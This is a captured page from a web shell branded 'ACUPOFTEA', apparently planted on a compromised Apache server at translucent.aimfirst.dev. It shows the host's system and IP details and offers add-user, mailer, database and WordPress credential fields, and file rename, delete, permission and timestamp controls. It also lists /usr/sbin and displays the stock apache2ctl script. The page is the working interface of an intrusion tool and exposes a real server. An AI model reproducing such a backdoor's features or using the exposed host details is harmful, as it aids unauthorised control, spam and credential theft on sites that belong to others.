System
:
Linux c09cd04ddcf6 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64
Software
:
Apache/2.4.51 (Debian)
Server
:
115.78.7.179
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
sbin
/
10.0.1.161
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for translucent.aimfirst.dev made by tabagkayu.
Folder Name
File Name
File Content
File
apache2ctl
#!/bin/sh # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # # Apache control script designed to allow an easy command line interface # to controlling Apache. Written by Marc Slemko, 1997/08/23 # # Heavily modified for Debian by Stefan Fritsch 2007-2010 # # The exit codes returned are: # XXX this doc is no longer correct now that the interesting # XXX functions are handled by httpd # 0 - operation completed successfully # 1 - # 2 - usage error # 3 - httpd could not be started # 4 - httpd could not be stopped # 5 - httpd could not be started during a restart # 6 - httpd could not be restarted during a restart # 7 - httpd could not be restarted during a graceful restart # 8 - configuration syntax error # # When multiple arguments are given, only the error from the _last_ # one is reported. Run "apachectl help" for usage info # ARGV="$@" # # |||||||||||||||||||| START CONFIGURATION SECTION |||||||||||||||||||| # -------------------- -------------------- # # main configuration directory if test -z "$APACHE_CONFDIR" ; then if test "${0##*apache2ctl-}" != "$0" ; then APACHE_CONFDIR="/etc/apache2-${0##*apache2ctl-}" else APACHE_CONFDIR=/etc/apache2 fi fi SUFFIX="${APACHE_CONFDIR##/etc/apache2-}" case "$SUFFIX" in /etc/apache2) SUFFIX="" ;; *) SUFFIX="@$SUFFIX" ;; esac APACHE_SYSTEMD_SERVICE="apache2$SUFFIX" # the path to the environment variable file test -z "$APACHE_ENVVARS" && APACHE_ENVVARS="$APACHE_CONFDIR/envvars" # pick up any necessary environment variables if test -f $APACHE_ENVVARS; then . $APACHE_ENVVARS fi if test "$APACHE_CONFDIR" != /etc/apache2 ; then APACHE_ARGUMENTS="-d $APACHE_CONFDIR $APACHE_ARGUMENTS" fi # the following APACHE_* variables should be set in /etc/apache2/envvars # # the path to your httpd binary, including options if necessary HTTPD=${APACHE_HTTPD:-/usr/sbin/apache2} # # a command that outputs a formatted text version of the HTML at the # url given on the command line. Designed for lynx, however other # programs may work. LYNX="${APACHE_LYNX:-www-browser -dump}" # # the URL to your server's mod_status status page. If you do not # have one, then status and fullstatus will not work. STATUSURL="${APACHE_STATUSURL:-http://localhost:80/server-status}" # # Set this variable to a command that increases the maximum # number of file descriptors allowed per child process. This is # critical for configurations that use many file descriptors, # such as mass vhosting, or a multithreaded server. ULIMIT_MAX_FILES="${APACHE_ULIMIT_MAX_FILES:-ulimit -n 8192}" # -------------------- -------------------- # |||||||||||||||||||| END CONFIGURATION SECTION |||||||||||||||||||| # Set the maximum number of file descriptors allowed per child process. if [ "x$ULIMIT_MAX_FILES" != "x" ] && [ `id -u` -eq 0 ] ; then if ! $ULIMIT_MAX_FILES ; then echo Setting ulimit failed. See README.Debian for more information. >&2 fi fi ERROR=0 if [ "x$ARGV" = "x" ] || [ "x$ARGV" = "xusage" ] || [ "x$ARGV" = "xhelp" ] || [ "x$ARGV" = "x--help" ]; then echo "Usage: $0 start|stop|restart|graceful|graceful-stop|configtest|status|fullstatus|help" >&2 echo " $0 <apache2 args>" >&2 echo " $0 -h (for help on <apache2 args>)" >&2 exit 1 fi get_status () { if ! $LYNX $STATUSURL ; then echo "'$LYNX $STATUSURL'" failed. >&2 echo Maybe you need to install a package providing www-browser or you >&2 echo need to adjust the APACHE_LYNX variable in /etc/apache2/envvars >&2 exit 1 fi } mkdir_chown () { local OWNER="$1" local DIR="$2" local STAT="$(LC_ALL=C stat -c %F:%U $DIR 2> /dev/null || true)" if [ "$STAT" = "" ] ; then local TMPNAME=$(mktemp -d $DIR.XXXXXXXXXX) || exit 1 chmod 755 $TMPNAME || exit 1 chown $OWNER $TMPNAME || exit 1 if ! mv -T $TMPNAME $DIR 2> /dev/null; then rmdir $TMPNAME # check for race with other apachectl if [ "$(LC_ALL=C stat -c %F:%U $DIR 2>/dev/null)" != "directory:$OWNER" ] then echo Cannot create $DIR with owner $OWNER. echo Please fix manually. Aborting. exit 1 fi fi elif [ "$STAT" != "directory:$OWNER" ] ; then echo $DIR already exists but is not a directory owned by $OWNER. echo Please fix manually. Aborting. exit 1 fi } [ ! -d ${APACHE_RUN_DIR:-/var/run/apache2} ] && mkdir -p ${APACHE_RUN_DIR:-/var/run/apache2} [ ! -d ${APACHE_LOCK_DIR:-/var/lock/apache2} ] && mkdir_chown ${APACHE_RUN_USER:-www-data} ${APACHE_LOCK_DIR:-/var/lock/apache2} case "$ARGV" in start) # ssl_scache shouldn't be here if we're just starting up. # (this is bad if there are several apache2 instances running) rm -f ${APACHE_RUN_DIR:-/var/run/apache2}/*ssl_scache* need_systemd=false if [ -z "$APACHE_STARTED_BY_SYSTEMD" ] ; then case "$(readlink -f /proc/1/exe)" in *systemd*) need_systemd=true ;; *) ;; esac fi if $need_systemd ; then # If running on systemd we should not start httpd without systemd # or systemd will get confused about the status of httpd. echo "Invoking 'systemctl start $APACHE_SYSTEMD_SERVICE'." echo "Use 'systemctl status $APACHE_SYSTEMD_SERVICE' for more info." systemctl start "$APACHE_SYSTEMD_SERVICE" else unset APACHE_STARTED_BY_SYSTEMD $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV" fi ERROR=$? ;; stop|graceful-stop) $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV" ERROR=$? ;; restart|graceful) if $HTTPD ${APACHE_ARGUMENTS} -t 2> /dev/null ; then $HTTPD ${APACHE_ARGUMENTS} -k "$ARGV" else $HTTPD ${APACHE_ARGUMENTS} -t fi ERROR=$? ;; startssl|sslstart|start-SSL) echo The startssl option is no longer supported. echo Please edit httpd.conf to include the SSL configuration settings echo and then use "apachectl start". ERROR=2 ;; configtest) $HTTPD ${APACHE_ARGUMENTS} -t ERROR=$? ;; status) get_status | awk ' /process$/ { print; exit } { print } ' ;; fullstatus) get_status ;; *) $HTTPD ${APACHE_ARGUMENTS} "$@" ERROR=$? esac if [ "$ERROR" != 0 ] ; then echo Action \'"$@"\' failed. echo The Apache error log may have more information. fi exit $ERROR
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2021-12-22 12:22:31
..
DIR
-
drwxr-xr-x
2021-12-20 12:00:00
a2disconf
text/x-perl
15.89 KB
-rwxr-xr-x
2020-08-08 07:47:06
a2dismod
text/x-perl
15.89 KB
-rwxr-xr-x
2020-08-08 07:47:06
a2dissite
text/x-perl
15.89 KB
-rwxr-xr-x
2020-08-08 07:47:06
a2enconf
text/x-perl
15.89 KB
-rwxr-xr-x
2020-08-08 07:47:06
a2enmod
text/x-perl
15.89 KB
-rwxr-xr-x
2020-08-08 07:47:06
a2ensite
text/x-perl
15.89 KB
-rwxr-xr-x
2020-08-08 07:47:06
a2query
text/x-perl
9.64 KB
-rwxr-xr-x
2021-10-07 05:49:44
add-shell
text/x-shellscript
915 B
-rwxr-xr-x
2020-09-27 05:25:47
addgroup
text/x-perl
33.71 KB
-rwxr-xr-x
2018-09-15 07:12:39
adduser
text/x-perl
33.71 KB
-rwxr-xr-x
2018-09-15 07:12:39
apache2
application/x-pie-executable
712.73 KB
-rwxr-xr-x
2021-10-07 05:49:44
apache2ctl
text/x-shellscript
7.06 KB
-rwxr-xr-x
2021-10-07 05:49:44
apachectl
text/x-shellscript
7.06 KB
-rwxr-xr-x
2021-10-07 05:49:44
check_forensic
text/x-shellscript
952 B
-rwxr-xr-x
2011-04-26 03:10:00
chgpasswd
application/x-pie-executable
66.05 KB
-rwxr-xr-x
2020-02-07 02:54:14
chmem
application/x-pie-executable
62.23 KB
-rwxr-xr-x
2021-07-28 07:09:07
chpasswd
application/x-pie-executable
58.05 KB
-rwxr-xr-x
2020-02-07 02:54:14
chroot
application/x-pie-executable
46.94 KB
-rwxr-xr-x
2020-09-24 08:36:09
cpgr
application/x-pie-executable
60.18 KB
-rwxr-xr-x
2020-02-07 02:54:14
cppw
application/x-pie-executable
60.18 KB
-rwxr-xr-x
2020-02-07 02:54:14
delgroup
text/x-perl
15.41 KB
-rwxr-xr-x
2018-09-15 07:12:39
deluser
text/x-perl
15.41 KB
-rwxr-xr-x
2018-09-15 07:12:39
dpkg-fsys-usrunmess
text/x-perl
12.11 KB
-rwxr-xr-x
2021-04-13 10:43:39
dpkg-preconfigure
text/x-perl
3.58 KB
-rwxr-xr-x
2021-06-10 05:17:49
dpkg-reconfigure
text/x-perl
4.34 KB
-rwxr-xr-x
2021-06-10 05:17:49
e2freefrag
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2021-06-07 11:27:15
e4crypt
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2021-06-07 11:27:15
e4defrag
application/x-pie-executable
34.15 KB
-rwxr-xr-x
2021-06-07 11:27:15
faillock
application/x-pie-executable
13.99 KB
-rwxr-xr-x
2021-08-26 07:11:23
fdformat
application/x-pie-executable
34.23 KB
-rwxr-xr-x
2021-07-28 07:09:07
filefrag
application/x-pie-executable
18.17 KB
-rwxr-xr-x
2021-06-07 11:27:15
groupadd
application/x-pie-executable
86.77 KB
-rwxr-xr-x
2020-02-07 02:54:14
groupdel
application/x-pie-executable
82.58 KB
-rwxr-xr-x
2020-02-07 02:54:14
groupmems
application/x-pie-executable
62.09 KB
-rwxr-xr-x
2020-02-07 02:54:14
groupmod
application/x-pie-executable
90.7 KB
-rwxr-xr-x
2020-02-07 02:54:14
grpck
application/x-pie-executable
62.02 KB
-rwxr-xr-x
2020-02-07 02:54:14
grpconv
application/x-pie-executable
57.9 KB
-rwxr-xr-x
2020-02-07 02:54:14
grpunconv
application/x-pie-executable
57.9 KB
-rwxr-xr-x
2020-02-07 02:54:14
httxt2dbm
application/x-pie-executable
14.16 KB
-rwxr-xr-x
2021-10-07 05:49:44
iconvconfig
application/x-pie-executable
30.66 KB
-rwxr-xr-x
2021-10-02 12:47:40
invoke-rc.d
text/x-shellscript
16.12 KB
-rwxr-xr-x
2020-12-14 08:19:00
ldattach
application/x-pie-executable
34.23 KB
-rwxr-xr-x
2021-07-28 07:09:07
mklost+found
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2021-06-07 11:27:15
newusers
application/x-pie-executable
94.64 KB
-rwxr-xr-x
2020-02-07 02:54:14
nologin
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2020-02-07 02:54:14
pam-auth-update
text/x-perl
20.2 KB
-rwxr-xr-x
2021-08-26 07:11:23
pam_getenv
text/x-perl
2.82 KB
-rwxr-xr-x
2021-01-30 10:09:52
pam_timestamp_check
application/x-pie-executable
13.99 KB
-rwxr-xr-x
2021-08-26 07:11:23
policy-rc.d
text/x-shellscript
255 B
-rwxr-xr-x
2021-12-20 12:00:00
pwck
application/x-pie-executable
58.02 KB
-rwxr-xr-x
2020-02-07 02:54:14
pwconv
application/x-pie-executable
53.89 KB
-rwxr-xr-x
2020-02-07 02:54:14
pwunconv
application/x-pie-executable
53.9 KB
-rwxr-xr-x
2020-02-07 02:54:14
readprofile
application/x-pie-executable
22.26 KB
-rwxr-xr-x
2021-07-28 07:09:07
remove-shell
text/x-shellscript
963 B
-rwxr-xr-x
2020-09-27 05:25:47
rmt
application/x-pie-executable
58.96 KB
-rwxr-xr-x
2021-02-17 09:55:26
rmt-tar
application/x-pie-executable
58.96 KB
-rwxr-xr-x
2021-02-17 09:55:26
rtcwake
application/x-pie-executable
46.23 KB
-rwxr-xr-x
2021-07-28 07:09:07
service
text/x-shellscript
8.88 KB
-rwxr-xr-x
2020-12-14 08:19:00
split-logfile
text/x-perl
2.36 KB
-rwxr-xr-x
2021-10-07 05:49:44
tarcat
text/x-shellscript
936 B
-rwxr-xr-x
2021-02-17 09:55:26
tzconfig
text/x-shellscript
106 B
-rwxr-xr-x
2016-01-21 05:04:38
update-ca-certificates
text/x-shellscript
5.18 KB
-rwxr-xr-x
2021-01-19 10:11:04
update-gsfontmap
text/x-shellscript
470 B
-rwxr-xr-x
2021-09-09 05:23:11
update-mime
text/x-perl
9.18 KB
-rwxr-xr-x
2021-02-25 06:24:36
update-passwd
application/x-pie-executable
34.41 KB
-rwxr-xr-x
2021-07-10 11:57:43
update-rc.d
text/x-perl
16.92 KB
-rwxr-xr-x
2020-12-14 08:19:00
useradd
application/x-pie-executable
139.52 KB
-rwxr-xr-x
2020-02-07 02:54:14
userdel
application/x-pie-executable
94.7 KB
-rwxr-xr-x
2020-02-07 02:54:14
usermod
application/x-pie-executable
135.34 KB
-rwxr-xr-x
2020-02-07 02:54:14
vigr
application/x-pie-executable
68.4 KB
-rwxr-xr-x
2020-02-07 02:54:14
vipw
application/x-pie-executable
68.4 KB
-rwxr-xr-x
2020-02-07 02:54:14
zic
application/x-pie-executable
54.56 KB
-rwxr-xr-x
2021-10-02 12:47:40
~ ACUPOFTEA - translucent.aimfirst.dev